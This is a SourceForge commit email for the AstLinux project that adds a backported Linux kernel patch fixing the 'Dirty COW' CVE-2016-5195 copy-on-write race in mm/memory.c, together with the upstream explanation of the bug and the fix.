[Astlinux-commits] SF.net SVN: astlinux:[7903] branches/1.0/project/astlinux/kernel-patches/ linux

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Revision: 7903
          http://sourceforge.net/p/astlinux/code/7903
Author:   abelbeck
Date:     2016-10-21 14:26:37 +0000 (Fri, 21 Oct 2016)
Log Message:
-----------
linux, fix "Dirty COW" CVE-2016-5195 privilege escalation vulnerability

Added Paths:
-----------
    branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch

Added: branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch
===================================================================

--- branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch	                        (rev 0)
+++ branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch	2016-10-21 14:26:37 UTC (rev 7903)
@@ -0,0 +1,146 @@
+From 243f858d7045b710a31c377112578387ead4dde1 Mon Sep 17 00:00:00 2001
+From: Michal Hocko <mh...@su...>
+Date: Sun, 16 Oct 2016 11:55:00 +0200
+Subject: mm, gup: close FOLL MAP_PRIVATE race
+
+commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
+
+faultin_page drops FOLL_WRITE after the page fault handler did the CoW
+and then we retry follow_page_mask to get our CoWed page. This is racy,
+however because the page might have been unmapped by that time and so
+we would have to do a page fault again, this time without CoW. This
+would cause the page cache corruption for FOLL_FORCE on MAP_PRIVATE
+read only mappings with obvious consequences.
+
+This is an ancient bug that was actually already fixed once by Linus
+eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race
+for write access") but that was then undone due to problems on s390
+by commit f33ea7f404e5 ("fix get_user_pages bug") because s390 didn't
+have proper dirty pte tracking until abf09bed3cce ("s390/mm: implement
+software dirty bits"). This wasn't a problem at the time as pointed out
+by Hugh Dickins because madvise relied on mmap_sem for write up until
+0a27a14a6292 ("mm: madvise avoid exclusive mmap_sem") but since then we
+can race with madvise which can unmap the fresh COWed page or with KSM
+and corrupt the content of the shared page.
+
+This patch is based on the Linus' approach to not clear FOLL_WRITE after
+the CoW page fault (aka VM_FAULT_WRITE) but instead introduces FOLL_COW
+to note this fact. The flag is then rechecked during follow_pfn_pte to
+enforce the page fault again if we do not see the CoWed page. Linus was
+suggesting to check pte_dirty again as s390 is OK now. But that would
+make backporting to some old kernels harder. So instead let's just make
+sure that vm_normal_page sees a pure anonymous page.
+
+This would guarantee we are seeing a real CoW page. Introduce
+can_follow_write_pte which checks both pte_write and falls back to
+PageAnon on forced write faults which passed CoW already. Thanks to Hugh
+to point out that a special care has to be taken for KSM pages because
+our COWed page might have been merged with a KSM one and keep its
+PageAnon flag.
+
+Fixes: 0a27a14a6292 ("mm: madvise avoid exclusive mmap_sem")
+Reported-by: Phil "not Paul" Oester <ke...@li...>
+Disclosed-by: Andy Lutomirski <lu...@ke...>
+Signed-off-by: Linus Torvalds <tor...@li...>
+Signed-off-by: Michal Hocko <mh...@su...>
+[bwh: Backported to 3.2:
+ - Adjust filename, context, indentation
+ - The 'no_page' exit path in follow_page() is different, so open-code the
+   cleanup
+ - Delete a now-unused label]
+Signed-off-by: Ben Hutchings <be...@de...>
+---
+ include/linux/mm.h |  1 +
+ mm/memory.c        | 39 ++++++++++++++++++++++++++++-----------
+ 2 files changed, 29 insertions(+), 11 deletions(-)
+
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index e5ee683..16394da 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1527,6 +1527,7 @@ struct page *follow_page(struct vm_area_struct *, unsigned long address,
+ #define FOLL_MLOCK	0x40	/* mark page as mlocked */
+ #define FOLL_SPLIT	0x80	/* don't return transhuge pages, split them */
+ #define FOLL_HWPOISON	0x100	/* check page is hwpoisoned */
++#define FOLL_COW	0x4000	/* internal GUP flag */
+ 
+ typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
+ 			void *data);
+diff --git a/mm/memory.c b/mm/memory.c
+index 675b211..2917e9b 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -1427,6 +1427,24 @@ int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
+ }
+ EXPORT_SYMBOL_GPL(zap_vma_ptes);
+ 
++static inline bool can_follow_write_pte(pte_t pte, struct page *page,
++					unsigned int flags)
++{
++	if (pte_write(pte))
++		return true;
++
++	/*
++	 * Make sure that we are really following CoWed page. We do not really
++	 * have to care about exclusiveness of the page because we only want
++	 * to ensure that once COWed page hasn't disappeared in the meantime
++	 * or it hasn't been merged to a KSM page.
++	 */
++	if ((flags & FOLL_FORCE) && (flags & FOLL_COW))
++		return page && PageAnon(page) && !PageKsm(page);
++
++	return false;
++}
++
+ /**
+  * follow_page - look up a page descriptor from a user-virtual address
+  * @vma: vm_area_struct mapping @address
+@@ -1509,10 +1527,13 @@ split_fallthrough:
+ 	pte = *ptep;
+ 	if (!pte_present(pte))
+ 		goto no_page;
+-	if ((flags & FOLL_WRITE) && !pte_write(pte))
+-		goto unlock;
+ 
+ 	page = vm_normal_page(vma, address, pte);
++	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) {
++		pte_unmap_unlock(ptep, ptl);
++		return NULL;
++	}
++
+ 	if (unlikely(!page)) {
+ 		if ((flags & FOLL_DUMP) ||
+ 		    !is_zero_pfn(pte_pfn(pte)))
+@@ -1555,7 +1576,7 @@ split_fallthrough:
+ 			unlock_page(page);
+ 		}
+ 	}
+-unlock:
++
+ 	pte_unmap_unlock(ptep, ptl);
+ out:
+ 	return page;
+@@ -1789,17 +1810,13 @@ int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
+ 				 * The VM_FAULT_WRITE bit tells us that
+ 				 * do_wp_page has broken COW when necessary,
+ 				 * even if maybe_mkwrite decided not to set
+-				 * pte_write. We can thus safely do subsequent
+-				 * page lookups as if they were reads. But only
+-				 * do so when looping for pte_write is futile:
+-				 * in some cases userspace may also be wanting
+-				 * to write to the gotten user page, which a
+-				 * read fault here might prevent (a readonly
+-				 * page might get reCOWed by userspace write).
++				 * pte_write. We cannot simply drop FOLL_WRITE
++				 * here because the COWed page might be gone by
++				 * the time we do the subsequent page lookups.
+ 				 */
+ 				if ((ret & VM_FAULT_WRITE) &&
+ 				    !(vma->vm_flags & VM_WRITE))
+-					foll_flags &= ~FOLL_WRITE;
++					foll_flags |= FOLL_COW;
+ 
+ 				cond_resched();
+ 			}
+-- 
+cgit v0.12

This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.





[Astlinux-commits] SF.net SVN: astlinux:[7903] branches/1.0/project/astlinux/kernel-patches/ linux

[Astlinux-commits] SF.net SVN: astlinux:[7903] branches/1.0/project/astlinux/kernel-patches/ linux-810-fix-CVE-2016-5195.patch